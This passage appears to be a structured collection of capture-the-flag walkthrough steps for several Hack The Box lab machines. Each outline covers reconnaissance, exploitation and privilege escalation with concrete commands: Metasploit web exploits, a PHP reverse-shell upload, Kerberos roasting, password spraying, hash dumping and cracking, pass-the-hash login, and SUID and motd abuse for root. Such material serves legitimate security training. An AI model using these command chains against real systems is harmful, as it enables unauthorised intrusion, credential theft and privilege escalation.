Inspect source code of http://spectra.htb/wp-config.php.save

4

Credential Access

Username and Password Discovery

Found credentials: username administrator, password devteam01

5

Web Exploitation

WordPress Admin Login

Login to WordPress admin panel with found credentials

6

Reverse Shell

Metasploit Reverse Shell

Use msfconsole and exploit/unix/webapp/wp_admin_shell_upload

7

Privilege Escalation

Sudo Privileges Exploitation

Use sudo with initctl for privilege escalation

8

Privilege Escalation

Editing Service Configuration

Edit /etc/init/test.conf to add chmod +s /bin/bash

9

Privilege Escalation

Gaining Root Access

Execute /bin/bash -p to spawn a shell with root privileges

1

Recon

Nmap Scan

nmap -sC -sV -p- 10.10.10.225

2

Web Enumeration

Inspect Source Code

Inspect source code for CVE-2019-18277 vulnerability

3

Exploitation

HTTP Request Smuggling

Edit and send crafted HTTP requests to exploit CVE-2019-18277

4

Post-Exploitation

Capture Admin Cookie

Reload the home page to capture the admin cookie after the exploit

5

Privilege Access

Use Credentials Found in Notes

Use credentials from notes to access different services (Chef, Dev Node, Nagios)

6

Privilege Access

Access Gitea Service

Log in to Gitea service with found credentials

7

Privilege Access

Find SSH Key for User

Find id_rsa_marcus key for user Marcus on Gitea service

8

Privilege Access

Use SSH Key to Gain Access

Use id_rsa_marcus to SSH into the machine as Marcus

1

Recon

Nmap Scan

nmap -sC -sV -p- 10.10.10.220

2

Web Enumeration

GitLab Sign In Page

Inspect GitLab sign in page for vulnerabilities

3

Exploitation

GitLab 11.4.7 Remote Code Execution

Follow steps from LiveOverflow video & article for RCE

4

Reverse Shell

Gain Reverse Shell

Use the payload from the video to gain a reverse shell

5

Post-Exploitation

Find Credentials

Locate gitlab.rb in /opt/backup to find SMTP password

6

Privilege Access

Use Found Credentials

Use found SMTP password to change user and gain root access in the docker container

7

Privilege Escalation

Escaping Docker Container

Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges

8

Root Access

SSH Key

Use the provided id_rsa key to SSH into the root account

1

Recon

Nmap Scan

nmap -sC -sV -oA nmap/result 10.10.10.240

2

FTP Enumeration

Anonymous FTP Access

ftp -pi 10.10.10.240 followed by ls and mget * to download files

3

Metadata Analysis

ExifTool Analysis

`exiftool *

4

Kerberos Attack

GetNPUsers.py Kerberos Preauthentication

GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/

5

Hash Cracking

John the Ripper

john hash -w=/usr/share/wordlists/rockyou.txt to crack Kerberos hash

1

Initial Scanning

Nmap Scan

nmap -sC -sV -oN nmap 10.10.10.199

2

Web Enumeration

Directory Scan

dirsearch -u 10.10.10.199 -w /opt/common.txt -e *

3

Exploitation

Vulnerability in OpenBSD

Use -schallenge as a username to bypass authentication

4

SSH Key Discovery

Cookie Modification

Modify the cookie to include a valid username to reveal SSH keys

5

SSH Access

Use Discovered SSH Key

ssh -i id_rsa jennifer@10.10.10.199

6

Privilege Escalation

Local Exploit for OpenBSD

nano authroot; chmod +x authroot; ./authroot to exploit CVE-2019-19520 / CVE-2019-19522

1

Reconnaissance

Nmap Scan

nmap -sV -sC -T4 -p- oouch.htb

2

Web Enumeration

Directory Scan

gobuster dir -u http://oouch.htb:5000/ -w big.txt

3

OAuth Exploitation

SSRF in Contact Page

Use SSRF to link account with admin

4

Access Token

Intercept Request with Burp

Intercept /oauth/connect request to get token-code

5

SSH Key Discovery

Accessing SSH Private Keys

Access API to retrieve SSH keys

6

Docker Exploitation

Exploit Docker UWSGI Service

Log into Docker and exploit UWSGI service running as www-data

7

Privilege Escalation

Exploit Dbus

Exploit Dbus to get a shell as root and obtain root.txt

1

Recon

Nmap scan

nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb

2

Enumeration

Enumerating SMB, HTTP, and RPC

enum4linux fuse.htb, smbclient -L fuse.htb, rpcclient -U FABRICORP\\tlavel 10.10.10.193

3

Exploitation

Password Spraying

msf > use auxiliary/scanner/smb/smb_login, medusa -h fuse.htb -U users.txt -P wordlist -M smbnt

4

Privilege Escalation

Abusing SeLoadDriverPrivilege

Compiling files with Visual Studio, using eoploaddriver.exe and ExploitCapcom.exe

5

Post-Exploitation

Accessing Admin Shell

evil-winrm -u Administrator -H <hash> -i fuse.htb

1

Recon

Nmap scan to find open ports

nmap -sC -sV -oA /result 10.10.10.212

2

Enumeration

Gobuster to find directories

gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

3

AWS Configuration

Configure AWS CLI

aws configure

4

Data Extraction

List tables and contents in DynamoDB

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request

5

Exploitation

Upload PHP reverse shell to the server

aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/

6

Privilege Escalation

Port forwarding and exploiting a web service for code execution as root

ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212

Create and trigger payload to get root's id_rsa

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

1

Recon

Nmap scanning

nmap -sC -sV -oA nmap/result 10.10.10.233

2

Exploitation

Drupalgeddon 2 Forms API Property Injection

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 followed by setting options and run

3

Gaining Access

Finding credentials in settings.php

Inspect /var/www/html/sites/default/settings.php for MySQL credentials

4

Database Access

Accessing MySQL database

mysql -u drupaluser -p -e 'show databases;'

5

Data Exfiltration

Dumping usernames and password hashes

mysql -u drupaluser -p -D drupal -e 'select name,pass from users;'

6

Password Cracking

Using John the Ripper to crack password hashes

john hash -w=/usr/share/wordlists/rockyou.txt

7

Access with SSH

SSH into the machine with cracked credentials

ssh brucetherealadmin@10.10.10.233

8

Privilege Escalation

Exploiting snapd (dirty_sock exploit)

Use the dirty_sock exploit to escalate privileges

9

Capture Flag

Reading user and root flags

cat user.txt and cat root.txt

1

Recon

Nmap scanning

nmap -sC -sV 10.10.10.181

2

Enumeration

Source code analysis, Gobuster

gobuster dir -w shells.txt -u http://10.10.10.181

3

Exploitation

Accessing web shell

Navigate to http://10.10.10.181/smevk.php, login with default creds

4

Access

SSH key upload

ssh-keygen, upload id_rsa.pub as authorized_keys

5

Initial Access

SSH as webadmin

ssh webadmin@10.10.10.181 -i id_rsa

6

Privilege Escalation (User)

Using luvit to execute commands as sysadmin

sudo -u sysadmin /home/sysadmin/luvit, then os.execute("/bin/bash -i")

7

Capture User Flag

Reading user flag

cat /home/sysadmin/user.txt

8

Privilege Escalation (Root)

Modifying 00-header for command execution

echo "id" >> /etc/update-motd.d/00-header

9

Capture Root Flag

Reading root flag

echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

1

Initial Scanning

Masscan

masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0

2

Host Discovery

Nmap Scan

nmap scan on 10.10.110.10, nmap scan on 10.10.110.254

3

Domain Discovery

CrackMapExec

crackmapexec on 10.10.110.10, crackmapexec on 10.10.110.254

4

Network Mapping

Host Enumeration

Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc.